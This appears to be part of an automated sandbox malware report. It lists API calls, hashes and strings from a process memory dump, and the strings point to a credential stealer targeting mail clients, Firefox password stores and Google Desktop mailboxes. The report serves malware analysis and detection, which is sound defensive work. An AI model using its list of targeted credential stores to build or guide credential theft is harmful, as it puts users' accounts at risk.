                                            • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                            • String ID:
                                            • API String ID: 2014771361-0
                                            • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                            • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                                            • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                            • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                                            APIs
                                            • memcmp.MSVCRT ref: 00406151
                                              • Part of subcall function 0040607F: memcmp.MSVCRT ref: 0040609D
                                              • Part of subcall function 0040607F: memcpy.MSVCRT ref: 004060CC
                                              • Part of subcall function 0040607F: memcpy.MSVCRT ref: 004060E1
                                            • memcmp.MSVCRT ref: 0040617C
                                            • memcmp.MSVCRT ref: 004061A4
                                            • memcpy.MSVCRT ref: 004061C1
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: memcmp$memcpy
                                            • String ID: global-salt$password-check
                                            • API String ID: 231171946-3927197501
                                            • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                            • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                                            • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                            • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                                            APIs
                                            • memset.MSVCRT ref: 0040644F
                                            • memcpy.MSVCRT ref: 00406462
                                            • memcpy.MSVCRT ref: 00406475
                                              • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                                              • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                                              • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                                              • Part of subcall function 00404888: memcpy.MSVCRT ref: 004048FC
                                              • Part of subcall function 00404888: memcpy.MSVCRT ref: 0040490E
                                            • memcpy.MSVCRT ref: 004064B9
                                            • memcpy.MSVCRT ref: 004064CC
                                            • memcpy.MSVCRT ref: 004064F9
                                            • memcpy.MSVCRT ref: 0040650E
                                              • Part of subcall function 00406286: memcpy.MSVCRT ref: 004062B2
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: memcpy$memset
                                            • String ID:
                                            • API String ID: 438689982-0
                                            • Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                            • Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
                                            • Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                            • Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
                                            APIs
                                              • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                            • memset.MSVCRT ref: 0040330B
                                            • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                            • strchr.MSVCRT ref: 0040335A
                                              • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                                            • strlen.MSVCRT ref: 0040339C
                                              • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                            • String ID: Personalities
                                            • API String ID: 2103853322-4287407858
                                            • Opcode ID: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                            • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                                            • Opcode Fuzzy Hash: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                            • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                                            APIs
                                            • GetParent.USER32(?), ref: 004090C2
                                            • GetWindowRect.USER32(?,?), ref: 004090CF
                                            • GetClientRect.USER32(00000000,?), ref: 004090DA
                                            • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                            • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: Window$Rect$ClientParentPoints
                                            • String ID:
                                            • API String ID: 4247780290-0
                                            • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                            • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                                            • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                            • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: _strcmpi$_mbscpy
                                            • String ID: smtp
                                            • API String ID: 2625860049-60245459
                                            • Opcode ID: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                            • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                                            • Opcode Fuzzy Hash: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                            • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                                            APIs
                                              • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                            • memset.MSVCRT ref: 00408258
                                              • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082A6
                                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082C3
                                            Strings
                                            • Software\Google\Google Desktop\Mailboxes, xrefs: 00408230
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: Close$EnumOpenmemset
                                            • String ID: Software\Google\Google Desktop\Mailboxes
                                            • API String ID: 2255314230-2212045309
                                            • Opcode ID: b9c6ba0a09f39c77023865a56f43d31249d27d4aeb116fb61def55debc704f1d
                                            • Instruction ID: e7ff4aa50d33639bacb2d5000aefce928628a80d8311d3545e17288fa3d3d8ee
                                            • Opcode Fuzzy Hash: b9c6ba0a09f39c77023865a56f43d31249d27d4aeb116fb61def55debc704f1d
                                            • Instruction Fuzzy Hash: 9D118F72408345ABD710EE51DC01EABBBACEFD0344F04093EBD9491091EB75D958C6AA
                                            APIs
                                            • memset.MSVCRT ref: 0040C28C
                                            • SetFocus.USER32(?,?), ref: 0040C314
                                              • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: FocusMessagePostmemset
                                            • String ID: S_@$l
                                            • API String ID: 3436799508-4018740455
                                            • Opcode ID: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                            • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                                            • Opcode Fuzzy Hash: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                            • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                                            APIs
                                            • memset.MSVCRT ref: 004092C0
                                            • GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                            • _mbscpy.MSVCRT ref: 004092FC
                                            Strings
                                            • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 004092A9
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: PrivateProfileString_mbscpymemset
                                            • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>
                                            • API String ID: 408644273-3424043681
                                            • Opcode ID: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                            • Instruction ID: a8dcbc571cfa5336c44be942190f1d9429afcf202dd246abef1f156f809eb6de
                                            • Opcode Fuzzy Hash: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                            • Instruction Fuzzy Hash: 02F0E0725011A83AEB1297549C02FCA779CCB0D307F1440A2B749E20C1D5F8DEC44A9D
                                            APIs
                                              • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                              • Part of subcall function 00406FC7: _mbscpy.MSVCRT ref: 00407011
                                            • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                            • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                            • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                            • String ID: MS Sans Serif
                                            • API String ID: 3492281209-168460110
                                            • Opcode ID: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                            • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                                            • Opcode Fuzzy Hash: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                            • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: ClassName_strcmpimemset
                                            • String ID: edit
                                            • API String ID: 275601554-2167791130
                                            • Opcode ID: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                            • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                                            • Opcode Fuzzy Hash: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                            • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: ??2@$memset
                                            • String ID:
                                            • API String ID: 1860491036-0
                                            • Opcode ID: ebb40f1ae782bd27a9c9ebb170ff663f9279e29e1a89e233aa61efeea33ca50f
                                            • Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
                                            • Opcode Fuzzy Hash: ebb40f1ae782bd27a9c9ebb170ff663f9279e29e1a89e233aa61efeea33ca50f
                                            • Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: memset$memcpy
                                            • String ID:
                                            • API String ID: 368790112-0
                                            • Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                            • Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
                                            • Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                            • Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
                                            • String ID:
                                            • API String ID: 1886415126-0
                                            • Opcode ID: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                            • Instruction ID: 0fc2308174198aa020173da426f8fce31fb0284c5be342abf897f659f69a0370
                                            • Opcode Fuzzy Hash: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                            • Instruction Fuzzy Hash: 6F21E472A013145BD320EB69C846B5BB7D8AF44734F044A1FFAA8D73D1D738E9448699
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: memcpy
                                            • String ID: @
                                            • API String ID: 3510742995-2766056989
                                            • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                            • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                                            • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                            • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: _strcmpi
                                            • String ID: C@$mail.identity
                                            • API String ID: 1439213657-721921413
                                            • Opcode ID: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                            • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                                            • Opcode Fuzzy Hash: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                            • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: ??3@
                                            • String ID:
                                            • API String ID: 613200358-0
                                            • Opcode ID: 95fe0c5ee96a68655d96064396ecbffa5b8939de9cee66978f58e17f988e32ec
                                            • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                                            • Opcode Fuzzy Hash: 95fe0c5ee96a68655d96064396ecbffa5b8939de9cee66978f58e17f988e32ec
                                            • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: _ultoasprintf
                                            • String ID: %s %s %s
                                            • API String ID: 432394123-3850900253
                                            • Opcode ID: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                            • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                                            • Opcode Fuzzy Hash: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                            • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                                            APIs
                                            • LoadMenuA.USER32(00000000), ref: 00409078
                                            • sprintf.MSVCRT ref: 0040909B
                                              • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                              • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                              • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                              • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                              • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                              • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                              • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                            • String ID: menu_%d
                                            • API String ID: 1129539653-2417748251
                                            • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                            • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                                            • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                            • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                                            APIs
                                            • _mbscpy.MSVCRT ref: 004070EB
                                              • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                              • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                            • _mbscat.MSVCRT ref: 004070FA
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: _mbscat$_mbscpystrlen
                                            • String ID: sqlite3.dll
                                            • API String ID: 1983510840-1155512374
                                            • Opcode ID: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                            • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                                            • Opcode Fuzzy Hash: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                            • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                                            APIs
                                            • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: PrivateProfileString
                                            • String ID: A4@$Server Details
                                            • API String ID: 1096422788-4071850762
                                            • Opcode ID: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                            • Instruction ID: 3fa8da6ebb007cc1aa22036e73777017e29eb1af1cc7e931feee2a89adc62c4b
                                            • Opcode Fuzzy Hash: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                            • Instruction Fuzzy Hash: C8C08C32189301BAEA418F80AD46F0EBBA2EBA8B00F044409B244200A682B94020EF17
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000B.00000002.3085207863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                            Similarity
                                            • API ID: memcpy
                                            • String ID:
                                            • API String ID: 3510742995-0
                                            • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                            • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                                            • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                            • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8